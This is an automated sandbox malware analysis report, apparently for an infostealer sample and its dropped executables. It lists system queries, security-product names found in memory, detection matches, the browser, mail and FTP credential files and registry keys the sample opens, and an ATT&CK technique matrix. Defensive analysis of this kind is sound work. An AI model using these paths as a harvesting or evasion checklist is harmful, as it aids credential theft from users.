                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6920C GetLocalTime,0_2_02E6920C
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeCode function: 0_2_02E6B78C GetVersionExA,0_2_02E6B78C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: 2jbMIxCFsK.exe, 00000000.00000003.2122962525.000000007ED80000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF00000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000002.2229949049.000000007E8C7000.00000004.00001000.00020000.00000000.sdmp, 2jbMIxCFsK.exe, 00000000.00000003.2121944923.000000007DF87000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 9.0.neworigin.exe.240000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.4540086325.000000000290C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.0000000002421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.4540086325.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.4540086325.0000000002914000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.000000000244C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2359317927.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000000.2158684981.0000000000242000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.4540497126.0000000002454000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2140, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: neworigin.exe PID: 2164, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      21
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      1
                      Taint Shared Content
                      1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      1
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      1
                      System Network Connections Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules
                      1
                      Scheduled Task/Job
                      1
                      Access Token Manipulation
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Command and Scripting Interpreter
                      21
                      Registry Run Keys / Startup Folder
                      311
                      Process Injection
                      1
                      Timestomp
                      NTDS47
                      System Information Discovery
                      Distributed Component Object Model21
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts1
                      Scheduled Task/Job
                      Network Logon Script1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      LSA Secrets1
                      Query Registry
                      SSH1
                      Clipboard Data
                      123
